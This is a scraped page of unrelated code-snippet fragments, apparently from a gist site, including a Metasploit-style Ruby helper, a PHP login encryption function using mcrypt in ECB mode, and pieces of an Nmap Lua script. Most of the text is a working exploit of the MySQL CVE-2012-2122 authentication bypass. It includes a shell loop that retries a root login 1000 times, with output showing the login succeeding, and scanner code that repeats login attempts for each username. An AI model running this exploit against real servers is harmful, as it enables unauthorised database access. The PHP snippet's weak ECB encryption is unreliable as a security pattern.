This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def stat_file(file_name) | |
data = [] | |
stat = {} | |
if session.type == "meterpreter" | |
raise "I think you can do this with session.fs.file.stat" | |
elsif session.respond_to? :shell_command_token | |
print_debug("platform is #{session.platform}") | |
case session.platform | |
when /windows/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// encryption functions used for login | |
function encrypt($value, $key){ | |
if(!$value){return false;} | |
$text = $value; | |
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB); | |
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND); | |
$ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv); | |
return trim(base64_encode($ciphertext)); //encode for db | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ubuntu@ip-10-227-118-34:~$ for i in `seq 1 1000`; do mysql -u root --password=cve-2012-2122 -h 127.0.0.1 2>/dev/null; done | |
Welcome to the MySQL monitor. Commands end with ; or \g. | |
Your MySQL connection id is 424 | |
Server version: 5.5.22-0ubuntu1 (Ubuntu) | |
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. | |
Oracle is a registered trademark of Oracle Corporation and/or its | |
affiliates. Other names may be trademarks of their respective | |
owners. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for username in usernames do | |
stdnse.print_debug( "Trying %s ...", username ) | |
-- try up to 300 times to trigger the vuln | |
for i = 0, 300, 1 do | |
stdnse.print_debug(2, "attempt number %d", i ) | |
local status, response = socket:connect(host, port) | |
if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
status, response = mysql.receiveGreeting( socket ) | |
if ( not(status) ) then | |
stdnse.print_debug(3, SCRIPT_NAME) | |
socket:close() | |
return response | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'shortport' | |
require 'stdnse' | |
require 'mysql' | |
require 'unpwdb' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
portrule = shortport.port_or_service(3306, "mysql") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
action = function( host, port ) | |
local socket = nmap.new_socket() | |
local catch = function() socket:close() end | |
local try = nmap.new_try(catch) | |
local result = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- set a reasonable timeout value | |
socket:set_timeout(5000) | |
-- get our usernames to try | |
local usernames = try(unpwdb.usernames()) | |
local password = "cve-2012-2122" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt ) | |
if response.errorcode == 0 then | |
table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) ) | |
break | |
end |
OlderNewer